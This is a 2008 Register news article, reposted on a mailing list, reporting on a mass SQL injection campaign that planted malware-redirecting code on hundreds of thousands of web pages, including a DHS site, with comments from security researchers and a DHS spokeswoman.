[Infowarrior] - DHS Website Compromised by SQL injection

Sat Apr 26 00:17:17 UTC 2008

Original URL: http://www.theregister.co.uk/2008/04/25/mass_web_attack_grows/
Department of Homeland Security website hacked!
By Dan Goodin
Published Friday 25th April 2008 18:57 GMT

The sophisticated mass infection that's injecting attack code into hundreds
of thousands of reputable web pages is growing and even infiltrated the
website of the Department of Homeland Security.

While so-called SQL injections are nothing new, this latest attack, which we
we reported earlier
(http://www.theregister.co.uk/2008/04/24/mass_web_attack/), is notable for
its ability to infect huge numbers of pages using only a single string of
text. At time of writing, Google searches  showed almost 520,000 pages
containing the infection string, though the exact number changes almost
constantly. As the screenshot below shows, even the DHS, which is
responsible for protecting US infrastructure against cyber attacks, wasn't
immune. Other hacked sites include those belonging to the United Nations and
the UK Civil Service.

Screenshot of Google search showing DHS website

The attack causes infected sites to redirect visitors to destinations that
attempt to install malware on vulnerable machines. At time of writing, the
malicious payloads attacked vulnerabilities that already have been patched.
And in any case all three of the redirection sites were down, possibly
because they were unable to handle the demand. But should the attackers get
their hands on a newer exploit - say, one targeting a zero-day vulnerability
in QuickTime 
(http://www.gnucitizen.org/blog/quicktime-0day-for-vista-and-xp/) - it would
be relatively easy for them to swap out the payload.

One reason the infection has spread so widely is the attackers have managed
to find a single attack string that seems to work on tens of thousands of
different sites. Most web applications are custom -built for a particular
site, so attackers likewise have to custom design attack parameters to
exploit weakness. Not so here.

"These guys look like they've found a methodology to get a successful SQL
injection generically across [many] websites," said Jeremiah Grossman, CTO
of WhiteHat Security, which helps companies secure web applications. "That
right there is like a skeleton key."

The script is also notable for its ability to slip past web application
defenses. The SQL query is mostly made up of HEX code, allowing it to
obscure itself, at least to apps that use Microsoft SQL. MySQL and
PostgreSQL are less easily fooled, according to researcher Ronald van den
Heetkamp (http://www.0x000000.com/?i=556).

Sites are getting pwned because they fail to sanitize user supplied data.
DHS security pros scrubbed the page clean the same day it got infected and
took steps to make sure the same attack couldn't succeed against other parts
of the DHS website, spokeswoman Amy Kudwa said.

"We're well aware of the fact that intrusions happen all the time and that's
why we are doing all that we are to secure the .gov domain," she said.

While the number of pages that have been infected is high, not all are able
to launch an attack once a user visits them, according to Roger Thompson,
chief research officer of anti-virus provider AVG.

"Very often they're on a page but the stuff doesn't actually fire when you
get there," he said. "This is not a cunning, premeditated task; it's just a
blast. They're just planting the stuff where they can and the result is a
lot of pages [that] don't do anything."

But webmasters should not be complacent about removing the injected code
from their sites and fixing buggy web apps to make sure more don't spring
up.

"It's the cleanup effort that's just going to be monstrous," said Grossman,
who said affected companies will have to either remove each overwritten
table record one at a time, or revert to a recent backup. "Either way, it's
going to take forever."

Security workers better get cracking. ®